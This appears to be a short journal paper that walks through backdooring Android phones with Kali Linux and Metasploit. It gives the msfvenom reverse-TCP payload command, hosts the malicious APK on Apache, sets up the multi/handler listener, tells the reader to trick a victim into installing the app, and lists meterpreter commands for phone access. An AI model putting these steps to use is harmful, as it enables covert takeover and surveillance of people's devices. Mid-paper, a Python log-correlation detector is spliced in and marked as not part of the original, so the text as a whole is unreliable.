
International Journal of Scientific Research in Computer Science, Engineering and Information Technology

ISSN : 2456-3307 (www.ijsrcseit.com)


doi : https://doi.org/10.32628/CSEIT2173111

Android Hacking in Kali Linux Using Metasploit Framework
Abhishek Arote1, Umakant Mandawkar2
1B.Tech Student, SOCSE, Sandip University, Nashik, Maharashtra, India
2Associate Professor, SOCSE, Sandip University, Nashik, Maharashtra, India

ABSTRACT

IT Security is a major concern of the internet as almost all communication takes place over the internet today. The purpose of penetration testing is to ensure that the system and network do not have a security breach that could allow unauthorized access to the system and network. A possible and appropriate way to prevent system and network hacking is penetration testing. The document outlines some basic concepts of penetration testing, evaluating existing tools and exploits, and using the Metasploit framework for penetration testing and running exploits within the framework and tools.

Keywords: Penetration Testing, Payload, Exploit, Meterpreter, Metasploit Framework.

Article Info
Volume 7, Issue 3
Page Number: 497-504
Publication Issue: May-June-2021
Article History
Accepted: 01 June 2021
Published: 07 June 2021

Copyright: © the author(s), publisher and licensee Technoscience Academy. This is an open-access article distributed under the terms of the Creative Commons Attribution Non-Commercial License, which permits unrestricted non-commercial use, distribution, and reproduction in any medium, provided the original work is properly cited.

Abhishek Arote et al Int. J. Sci. Res. Comput. Sci. Eng. Inf. Technol, May-June - 2021, 7 (3) : 497-504

I. INTRODUCTION

In the contemporary era, people are increasingly dependent on computers, information technology and security. Information on the Internet is a major concern for society and the IT industry. The security of infrastructure and software is one of the IT world's primary concerns. Today, even small details are stored in the databases of computer systems on the Internet. To ensure that the information is secure and non-vulnerable and that it complies with the assigned security regulations, security experts have developed various high-performance security tools and approaches such as Layered Design, Assurance or Proof of Correctness, Software Engineering Environment and Penetration Testing. Penetration tests are an essential technique for testing the complete operational, integrated and reliable computer base consisting of software, hardware and people. Open source frameworks used for penetration testing (such as Metasploit for exploit generation) use more than 1,600 exploits and 495 payloads to attack networks and computer systems. Penetration testing is performed by simulating unauthorized access to the system using a manual method, automated tools, or a combination of both methods.

"Mitigating Cyber Security Attacks by Being Aware of Vulnerabilities and Bugs" describes how to handle cyber security attacks by spreading awareness about vulnerabilities and threats, attack methodology, and defense strategies for vulnerabilities [1]. "Protection against penetration attacks using Metasploit" discusses script-based attacks, uses Metasploit's built-in modules to exploit the target system, implements Metasploit attacks and analyzes scripts and payloads to prepare a defense
script [3]. "Using Kali Linux Security Tools to Create Laboratory Projects for Cybersecurity Education" describes the installation and lists of tools provided by Kali Linux 2017.3 and uses preconfigured and preinstalled tools for laboratory projects using VMware (virtual machine framework) [6]. In "Offensive Security: Ethical Hacking Methodology on the Web" the objective is to plan a methodology and generate policies for security assurance and ISO 2007 attacks, with risk analysis using the MSAT 4.0 tool based on the ISO standard [9].

1.1 WHAT IS PENETRATION TESTING?

Penetration testing, also known as ethical hacking, is the examination of a computer system, network or web application to find loopholes that an attacker could exploit. Penetration testing can be carried out with files/applications or performed by individuals. It involves gathering information on the target before testing, identifying potential entry points, attempting to get in (either virtually or for real), and reporting results. It is the procedure of assessing the security of an organization by exploiting vulnerabilities in the way that attackers could exploit them, thereby preventing and documenting the attack process.

1.2 WHY PERFORM A PENETRATION TEST?

If an unauthorized person used a vulnerability to access corporate resources, those resources could be compromised. The goal of penetration testing is to fix vulnerabilities before they can be used.

II. STAGES IN PENETRATION TESTING

INFORMATION GATHERING: Information gathering means gathering different types of information about the target. It is the first stage of ethical hacking, where penetration testers or ethical hackers (both black hat and white hat) use it to gather all the information about the victim or target.

UPDATE AND INITIATION: Update Kali Linux and start the apache2 service to host the Android application on a web server so the victim can access it. The state of apache may be active or inactive.

CREATING PAYLOAD AND EXPLOITATION: The main goal of a pen tester is to crack all kinds of security and gain remote access to the server; for this we use the Metasploit Framework. Moreover, we create a file using a payload and exploit to append a virus to the application or file.

REPORT GENERATION: At this stage, we only create a full report on our penetration testing process.

III. EXPLOITATION OF VULNERABILITIES

The exploitation phase of the penetration test is performed using a web server and some tools which are already built into the Kali Linux OS. These tools are free and open source, and are made available by the developers of Kali Linux, i.e. Offensive Security.

A. Apache2 Server
The Apache HTTP Server is a free, open source web server that delivers our content via the web service over the Internet. It fully supports all operating systems such as UNIX, Windows, Linux etc. and is now becoming the most popular HTTP client.

B. Metasploit Framework
Metasploit Framework is an open source penetration testing and development platform that provides exploits for a wide variety of applications, operating systems, and platforms. Metasploit is one of the most widely used penetration testing tools and is built into Kali Linux.

Volume 7, Issue 3, May-June-2021 | http://ijsrcseit.com 498



IV. GENERATING RESULTS OF TEST

The test results should contain solutions to reduce or eliminate the weak points. This is what distinguishes a penetration test from a security audit. Significant vulnerabilities that have been identified must be addressed first, and a specific schedule must be established to verify that the vulnerabilities have been addressed. The department, network or system can be selected for the same penetration testing process.

The solutions implemented depend on the vulnerabilities identified, the loss to the company if the conditions that triggered the vulnerability occur, and the cost (and effectiveness) of the solutions available. One solution might require a new system running a web server to pass a vulnerability test before the web port is opened in the firewall. Another solution might require that all email within the domain be sent to a central mail system and delivered to the local host systems through the central mail server. Enforcement of existing policies may be the only condition needed to address certain vulnerabilities. In the case of desktop security, remote management software may already be banned in the company, but better work needs to be done to ensure compliance. There will be vulnerabilities that can be fixed by applying the latest version of the application or the operating system patch. The results of the report should be closely monitored. If the information falls into the wrong hands, an unauthorized person could exploit the current vulnerabilities.

V. TEST PERFORMED

INFORMATION GATHERING : Our first task is to log in to the host or attacking system. When we start the information gathering phase, we first find out the IP of the victim. Secondly, we switch to the root user or super user from the normal user to get maximum permissions on the system, i.e. read, write and execute. Finally, we check the Internet Protocol address of the attacking system.

Command to login into root user :-
$ sudo su (to switch from normal user to super user to get all permissions, i.e. read, write and execute)

Command to check the ip address :-
$ ifconfig (to verify the Internet Protocol address of the host machine)

ATTACKERS IP :- 192.168.0.196 (INTERNET PROTOCOL ADDRESS OF KALI OS)

A. SWITCHING TO ROOT USER :-

To switch from a normal or ordinary user to the super user or root user: root is the real name of the administrator account. "sudo" is a command that enables ordinary users to perform administrative tasks. The root user has user ID 0 and nominally unlimited privileges. Root can access any file, run any program, make any system call, and change any configuration.

Fig 1.1 : Switching To Root User


B. CHECK IP ADDRESS :-

An IP address is a unique identification of a device on the Internet or on a LAN. IP stands for "Internet Protocol": these are the rules that regulate the format of data that is sent over the Internet or a LAN. The four types of IP addresses are public, private, static, and dynamic. Public and private indicate the position in the network (private is used in the network, public is outside the network), and static and dynamic indicate permanence.

Number of bits in an IP address : 32

Fig 1.2 : IP Address Lookup

C. UPDATE KALI LINUX :-

In short, to cleanly update your Kali system, you only need to configure the repositories and update with the $ sudo apt upgrade command.

Fig 1.3 : Upgradation of Kali Linux

D. INITIATION OF APACHE SERVER

The Apache HTTP Server, commonly known as Apache, is free, open source, cross-platform web server software released under the Apache 2 license. Apache is developed and maintained by an open developer community under the protection of the Apache Software Foundation.

Commands To Start Apache2 Server :

# service apache2 status (to verify whether the service is active or inactive)
# service apache2 start (to activate the service)

Fig 1.4 : Apache2 Server State Active Or Inactive

E. CREATING PAYLOAD WITH MSFVENOM

The payload is an integral part of the attack that harms the victim. Attack vectors such as viruses, worms, and malware may contain multiple harmful payloads.

Metasploit payloads are divided into three types:

Single: A single file is very small and aims to establish a certain connection, and then enter the next level.

Staged: This is the payload that an attacker can use to upload larger files to the victim's system.


Stages: A stage is a payload component loaded using the stager module. Payload stages provide advanced features with no size limitation, such as Meterpreter and VNC injection.

Commands to create payload :

# msfvenom -p android/meterpreter/reverse_tcp LHOST=attacker's IP LPORT=4444 R > /var/www/html/malicious.apk

(This command creates a malicious file, which you host on the Apache server in /var/www/html so the victim can access it.)

Fig 1.5 : Activating Apache2 Server & Creating Payload

F. START METASPLOIT FRAMEWORK

Metasploit is one of the most powerful and widely used tools for penetration testing. The Metasploit Project is a computer security project that provides data about security vulnerabilities and aids in penetration testing and IDS signature development. The Metasploit Framework lets us make use of the payload that was generated.

Fig 1.6 : Starting Metasploit Framework Using msfconsole

G. EXPLOITATION

During exploitation, we need to use exploit/multi/handler to handle the msf process. Then we have to set the PAYLOAD, which is android/meterpreter/reverse_tcp: Android because that is the device we have to gain access to, and reverse TCP because the TCP port is open on the internet. Then set the LHOST and LPORT to exploit the apk on the host machine. Lastly, exploit the payload.

COMMANDS TO EXPLOIT :-

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
msf6 exploit(multi/handler) > set LHOST attackers IP
msf6 exploit(multi/handler) > exploit
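A defender's view of the flow in sections E to G, as an added example that is not part of the original paper: the APK is fetched over HTTP from one host, and the installed app then connects back to that same host on LPORT. The simplified log formats, the device addresses and the 30-minute window are assumptions made for illustration.

```python
"""Correlate an APK download with a later TCP connection back to the same host."""
from datetime import datetime, timedelta

# Constructed sample records in a hypothetical, simplified log format.
# HTTP log fields: time, client IP, server IP, server port, request path
HTTP_LOG = """\
2021-06-01T10:00:05 192.168.0.50 192.168.0.196 80 /malicious.apk
2021-06-01T10:01:10 192.168.0.51 192.168.0.196 80 /index.html
2021-06-01T10:02:00 192.168.0.52 203.0.113.10 80 /store/update.apk
"""
# Flow log fields: time, source IP, destination IP, destination port
FLOW_LOG = """\
2021-06-01T10:03:40 192.168.0.50 192.168.0.196 4444
2021-06-01T10:04:00 192.168.0.51 192.168.0.196 80
2021-06-01T10:05:00 192.168.0.52 203.0.113.10 443
2021-06-01T12:30:00 192.168.0.52 203.0.113.10 8443
"""

WEB_PORTS = {80, 443}           # connections to ordinary web ports are ignored
WINDOW = timedelta(minutes=30)  # assumed maximum gap between download and callback


def parse(text, n_fields):
    """Yield records as lists, skipping blank or malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != n_fields:
            continue
        try:
            parts[0] = datetime.fromisoformat(parts[0])
        except ValueError:
            continue
        yield parts


def find_apk_callbacks(http_text, flow_text, window=WINDOW):
    """Return alerts for devices that fetched an .apk and then connected
    to the same server IP on a non-web port within `window`."""
    downloads = [
        (ts, client, server, path)
        for ts, client, server, _port, path in parse(http_text, 5)
        if path.split("?", 1)[0].lower().endswith(".apk")
    ]
    alerts = []
    for ts, src, dst, port in parse(flow_text, 4):
        if not port.isdigit() or int(port) in WEB_PORTS:
            continue
        for d_ts, client, server, path in downloads:
            delay = ts - d_ts
            if (src, dst) == (client, server) and timedelta(0) <= delay <= window:
                alerts.append({"device": src, "host": dst, "port": int(port),
                               "apk": path, "delay_s": int(delay.total_seconds())})
    return alerts


if __name__ == "__main__":
    for alert in find_apk_callbacks(HTTP_LOG, FLOW_LOG):
        print(alert)
```

Only the first device is reported: the third device also fetched an APK, but its later non-web connection falls outside the window.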


Fig 1.7 : Using Exploits, Setting Payload And LHOST, Exploitation

H. GAINED ACCESS : (Meterpreter Session Opened)

We have to use some social engineering attack to gain access to the Android device. Social engineering attacks are usually a kind of psychological manipulation that tricks unsuspecting users or workers into revealing confidential or sensitive information. In general, social engineering involves email or other communications that create urgency, fear, or similar emotions in the victim, which lead the victim to quickly disclose confidential information, click on a malicious link, or open a malicious file. Because social engineering involves a human component, it can be tough for firms to prevent these attacks.

COMMAND TO INTERACT WITH SESSIONS :

msf6 exploit(multi/handler) > sessions -i 1 (interaction with session 1, which is opened)
meterpreter > help (to know all the commands)
meterpreter > app_list (command to see the apps installed on android device)
meterpreter > app_uninstall (command to uninstall the app)

The attacker can access the camera, dump call logs, access the file manager and dump messages. The attacker can do whatever he wants.

Fig 1.8 : Gained Access Of Victim's Device (Meterpreter Session Opened)

Fig 1.9 : Apps Installed On Victim's Android Device

VI. RESULT

1. The Metasploit platform is used to break into Android devices using tools developed by Offensive Security like MSF. These tools can help students and professionals learn new things.
2. Often we as penetration testers successfully gain access to a system through an exploit and meterpreters.

VII. CONCLUSION

Penetration testing is a comprehensive method of identifying vulnerabilities in a system. It offers benefits such as avoiding financial loss, compliance with industry regulators, customers and shareholders, preserving the corporate image, and proactive elimination of identified risks. Testers can choose between black


box, white box and gray box tests, depending on the amount of information available to the user. Testers can also choose between internal and external tests, depending on the specific objectives. There are three types of penetration testing: network, application, and social engineering. This document gives a brief idea of Android hacking and the step-by-step process to gain access to an Android device.

VIII. REFERENCES

[1]. O. Aslan and R. Samet, "Mitigating Cyber Security Attacks by Being Aware of Vulnerabilities and Bugs," 2017 International Conference on Cyberworlds (CW), Chester, pp. 222-225, 2017.
[2]. Internet Crime Complaint Centre link: www.ic3.gov
[3]. H. Gupta and R. Kumar, "Protection against penetration attacks using Metasploit," in 2015 4th International Conference on Reliability, Infocom Technologies and Optimization (ICRITO) (Trends and Future Directions), Noida, India, pp. 1–4, 2015.
[4]. Muniz, J. & Lakhani, A. (2013). Web Penetration Testing with Kali Linux: a practical guide to implementing penetration testing strategies on websites, web applications, and standard web protocols with Kali Linux. Birmingham: Packt Publishing.
[5]. Singh, A. (2012). Metasploit penetration testing cookbook: over 70 recipes to master the most widely used penetration testing framework. Birmingham: Packt Pub.
[6]. A. Ghafarian, "Using Kali Linux Security Tools to Create Laboratory Projects for Cybersecurity Education," in Proceedings of the Future Technologies Conference (FTC) 2018, vol. 881, Cham: Springer International Publishing, pp. 358–367, 2019.
[7]. M. C. Tran and Y. Nakamura, "Classification of HTTP automated software communication behaviour using NoSql database," in 2016 International Conference on Electronics, Information, and Communications (ICEIC), Danang, Vietnam, pp. 1–4, 2016.
[8]. A. Chowdhury, "Recent Cyber Security Attacks and Their Mitigation Approaches – An Overview," in Applications and Techniques in Information Security, vol. 651, L. Batten and G. Li, Eds. Singapore: Springer Singapore, pp. 54–65, 2016.
[9]. F. Cuzme-Rodríguez, M. León-Gudiño, L. Suárez-Zambrano, and M. Domínguez-Limaico, "Offensive Security: Ethical Hacking Methodology on the Web," in Information and Communication Technologies of Ecuador (TIC.EC), vol. 884, M. Botto-Tobar, L. Barba-Maggi, J. González-Huerta, P. Villacrés-Cevallos, O. S. Gómez, and M. I. Uvidia-Fassler, Eds. Cham: Springer International Publishing, pp. 127–140, 2019.
[10]. F. Holik, J. Horalek, O. Marik, S. Neradova and S. Zitta, "Effective penetration testing with Metasploit framework and methodologies," 2014 IEEE 15th International Symposium on Computational Intelligence and Informatics (CINTI), Budapest, pp. 237-242, 2014.
[11]. M. Denis, C. Zena and T. Hayajneh, "Penetration testing: Concepts, attack methods, and defense strategies," 2016 IEEE Long Island Systems, Applications and Technology Conference (LISAT), Farmingdale, NY, pp. 1-6, 2016.
[12]. S. Nagpure and S. Kurkure, "Vulnerability Assessment and Penetration Testing of Web Application," in 2017 International Conference on Computing, Communication, Control and Automation (ICCUBEA), PUNE, India, pp. 1–6, 2017.
[13]. L. Qiang, Y. Zeming, L. Baoxu, J. Zhengwei, and Y. Jian, "Framework of Cyber Attack Attribution Based on Threat Intelligence," in Interoperability, Safety and Security in IoT, vol. 190, N. Mitton, H. Chaouchi, T. Noel, T. Watteyne, A. Gabillon, and P. Capolsini, Eds. Cham: Springer International Publishing, pp. 92–103, 2017.
[14]. Y. Wang and J. Yang, "Ethical Hacking and Network Defense: Choose Your Best Network Vulnerability Scanning Tool," in 2017 31st International Conference on Advanced Information Networking and Applications Workshops (WAINA), Taipei, Taiwan, pp. 110–113, 2017.
[15]. Y. Kim, I. Kim, and N. Park, "Analysis of Cyber Attacks and Security Intelligence," in Mobile, Ubiquitous, and Intelligent Computing, vol. 274, J. J. Park, H. Adeli, N. Park, and I. Woungang, Eds. Berlin, Heidelberg: Springer Berlin Heidelberg, pp. 489–494, 2014.

Cite this article as :

Abhishek Arote, Umakant Mandawkar, "Android Hacking in Kali Linux Using Metasploit Framework", International Journal of Scientific Research in Computer Science, Engineering and Information Technology (IJSRCSEIT), ISSN : 2456-3307, Volume 7 Issue 3, pp. 497-504, May-June 2021. Available at doi : https://doi.org/10.32628/CSEIT2173111
Journal URL : https://ijsrcseit.com/CSEIT2173111
